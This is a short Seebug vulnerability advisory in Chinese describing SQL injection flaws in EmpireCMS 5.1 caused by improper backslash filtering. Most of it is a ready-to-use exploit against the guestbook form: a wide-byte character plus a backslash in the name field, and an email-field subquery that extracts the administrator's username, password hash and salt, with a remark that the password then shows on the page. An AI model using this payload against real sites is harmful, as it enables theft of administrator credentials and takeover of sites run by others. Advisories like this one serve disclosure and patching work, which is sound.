帝国(EmpireCMS) 5.1 多个注射漏洞

2009-06-29T00:00:00
ID SSV:11704
Type seebug
Reporter Root
Modified 2009-06-29T00:00:00

Description

EmpireCMS 5.1 有个过滤函数没处理好\,可能导致产生多处垃圾类型的注射漏洞

比如留言处注射:

e/tool/gbook/?bid=1

姓名: 縗\

邮箱:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*

电话和留言内容随便写,提交完了就可以看到密码了

EmpireCMS 5.1 暂无, www.phome.net/